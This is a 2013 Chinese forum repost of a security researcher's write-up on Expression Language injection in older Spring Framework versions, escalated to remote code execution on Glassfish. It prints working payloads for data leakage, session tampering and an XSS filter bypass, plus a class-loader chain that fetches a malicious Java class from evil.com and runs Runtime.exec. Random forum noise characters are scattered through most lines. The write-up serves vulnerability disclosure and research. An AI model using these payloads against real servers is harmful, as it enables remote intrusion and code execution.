Remote Code with
: f/ ]+ k4 J- Y* k) nExpression Language Injection
/ q+ X) H* x! F# rSpring Framework脆弱性—DanAmodio5 j1 _7 Y8 x' c. q, B7 V. I6 ?9 q% A: T
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中* ^, z5 B: {% l, \ [+ C, V0 V3 m
可能会存在风险。9 `# Z& [- U) s6 y( t3 P3 N0 K0 w
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
- s9 R5 j) R( Q* t- D. D7 E, zArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
# Y5 x$ s# l6 F6 e. M以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
7 R; U0 A' J! H0 X2 y4 K以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
7 t$ T* L% j5 y) E9 }; T版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。2 F1 C5 g# u- I: U
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但9 a9 T, {% n2 m, j }
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
. @ g4 ?7 N! P) u) {; v( P本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。6 u" O' |. B' I- ]& Z8 I
这些版本不支持禁用double EL resolution.
" f9 N; b) \, e2 n7 F, s, Y这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
% M+ L' d$ w4 C! O4 i nEL2.2容器上可能进行远程代码执行。. m) d- A0 a i& U, H
这是一个原始信息泄露的攻击例子:
& C1 i* j$ a* o j/ v请求:' a9 d6 Q R. W+ G8 b0 r G7 m' L
ttp://vulnerable.com/foo?message=${applicationScope}. j1 z9 w% k0 ^* r$ o+ Q) s6 a
到达以下内容页面:
6 c2 l& {) Z: g结果将输出一些包含内部服务器信息calsspath 和本地工作目录
5 q( N# y$ l0 |, j你也可以做一些其他事情,如这样:4 s3 ]4 k7 _7 H0 C+ ~! ~( B, a
${9999+1}
. n4 j; r" U, l# B2 U还可以访问session 对象和beans
# P# p. ~, q0 r# D2 x${employee.lastName}
9 H: p( X9 ]3 n# Q在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是) S. k9 I( \; p5 D
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
; |' }. R- h+ g, X7 l西,比如XSS.
. ?( `, T! w# I3 n9 o2 }哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签2 [4 l7 `0 t" f6 ]( e4 E
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤: y0 {2 S) _) Z( |: X1 J
呢?”
/ k0 V3 [' |# s8 y5 Y6 L! v7 G因此,我尝试巳缦拢�
$ Z, X/ B! w' l6 Khttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
8 Y' _. v9 {. e6 b! g: a8 |P# k v3 `# ^: f: h
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
) c! h- l0 g3 a( p7 t9 X回的文本被插入进了spring:message 标签。
6 P6 B7 z) r5 b% }6 K% c1 O @这里是一个最终绕过过滤的实例:
, M: e; F' H3 |/ h/ B5 _http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
- y( p' q6 y1 S1 P( u它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为. f1 N$ p) S- g: B$ _( X4 y
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?& r! ?2 y' K& F( \2 x
经过一番研究,我学习到EL2.2 增加了方法调用。
% f; U& i c- a2 j2 e9 P; k我写了一个快速测试应用程序代码并且检测一些功能8 _& O7 M, D: u- \3 I
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
2 g7 Q6 i m6 @" _${pageContext.request.getSession().setAttribute(“admin”,true)}
, K! B( ?* M( o( o9 L好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的- D' g. q" y5 H* I- ]" T
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?9 R1 z1 p! p3 S$ v2 x& e
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
: j. y9 A3 z {& [“, 1234)} d! A5 [& f9 L+ X) _. H+ O/ K
${“”.getClass().forName(“java.lang.Runtime”)}& t% h9 \4 d. u+ u) N. @
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不( Y9 {' K+ P- z/ U* T# Y
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
% u! x, ~: }1 |数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有- Z# ~5 @- r) p1 Q4 ]$ M0 W! ^
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于3 i! W. W5 `3 B/ J# k) i i
方法签名invoke(Object obj, Object„ args)8 }) f7 X/ s+ W* H4 w+ J
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问1 @6 f, k. ~, E, u$ |7 A' {
题,以让它可以工作起来。2 [- V$ n: N1 h3 N
漏洞利用:& O- m. [2 b% G/ m- E( T: U
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
( O9 ?+ w4 o. W! C# z7 t希望你们中的一些JAVA奇才告诉我我是如此的可笑。
* e2 F" e3 X) n3 ]3 s4 V这里有一些我试过的失败的用例,为了试图让它工作的用例:$ X ]; Q2 a$ r5 N- G( s: e
写文件到文件系统
: K! D, M/ Y2 P 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.2 h+ h7 |: S9 N- x3 h/ `- r0 W: {
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
! I* Q) ^" F/ g0 a* Z${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
0 @7 d1 a N1 D9 H4 B4 F# m) Ujavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
x; n$ x( f/ {) y0 t! @: g/ gorg.springframework.expression.spel.standard.SpelExpressionParser not found
1 y" u# j8 N8 F" r: n6 [3 ^by
# E. t+ f5 j) A' ^9 M: d+ Xorg.glassfish.web.javax.servlet.jsp [194].
' T6 E- M2 X& J2 ]8 y9 E3 n3 j* { 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
( k: o7 |7 V+ S5 e 利用反射来创建一个新的Runtime(and watch the world burn)
# f, P7 x8 z Q; n: u6 q e${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
8 Z4 h) H7 W C L(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
$ g/ Z: W; V0 N4 Z${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}; i0 L Q9 X. p6 H+ A" i7 f8 E# d0 e
使用java.lang.ProcessBuilder
4 O- T7 ]/ N& Z7 l; n4 \- f 用表达式语言来评估表达式语言/ k7 @# U' |: w Y, B1 G
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
' i0 N6 ]! r# J9 U${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
+ n5 t- H8 X6 F j0 g“,”".getClass(),null)}
4 c: r5 r3 c( {$ K9 A" q 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
1 N) A) e) A f* Z; X; H我在使用一个空数组通过Method.invoke()时失败了很多次. d4 ]* r$ R/ r! O; g4 X2 C
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo1 N. ^2 t8 I" n$ d }4 O
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
G1 u( d" r V+ rrrayList”).newInstance().toArray())
% @* a* e: g( A+ u& [' Pjava.lang.IllegalArgumentException: wrong number of arguments" F2 w+ u8 }0 Q1 y) R
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
6 J3 m' r9 i! d8 y7 Q以创建一个恶意class文件并且指向类装载器.6 V7 ^3 ~/ x; \; q
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:& k% \, S& L! F+ a- p
public class Malicious {3 Q: f# v% p7 Z; P. ?2 Z! b" f
public Malicious() {
3 y0 S6 b) c: K# Wtry {+ h* l/ b0 J( y2 z! d! H
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
6 u# k8 P s% \! |1 A( H( Fjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win% f. R: t9 |/ v- S: m
} catch (Exception e) {+ M, h$ M, S6 r t8 w7 E0 X
}
' \; r4 v8 V7 @( m4 Y# d- o" R- F}" y9 @! y& u/ h3 Y# X) u w2 p4 p
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回0 H) X% U/ C+ v; ^# u6 z3 r: j8 S" j
话中,因此它可以被使用.
1 G% G/ F$ L, V${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName* K. I( I; m9 D& _
(“java.util.ArrayList”).newInstance())}
) i' B ~$ L/ \: l9 tURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
8 z- q* ^# @7 N* A' B一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
; E$ A+ g5 d/ y7 zgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
0 g1 y e' z2 c2 a: Y我们可以调用的create(string)方法,然后转换对一个URL对象。
! ?; b# C# r( k3 s8 x; [$ _, D${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
6 A: ` A+ \" Y( W$ were/malicious/classfile/is/located/”).toURL())}3 O4 |* h% _% d% e5 F
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,# N3 W9 a# k$ A5 w/ K2 l: {' y
恶意类文件被装载并创建,触发远程代码.
0 t h4 C3 s: N- B: r${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
9 l* [2 z# i; {xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().& O: M- k( r0 q* [4 N- C% {" W
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance5 k% N K* o$ |) I6 B
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对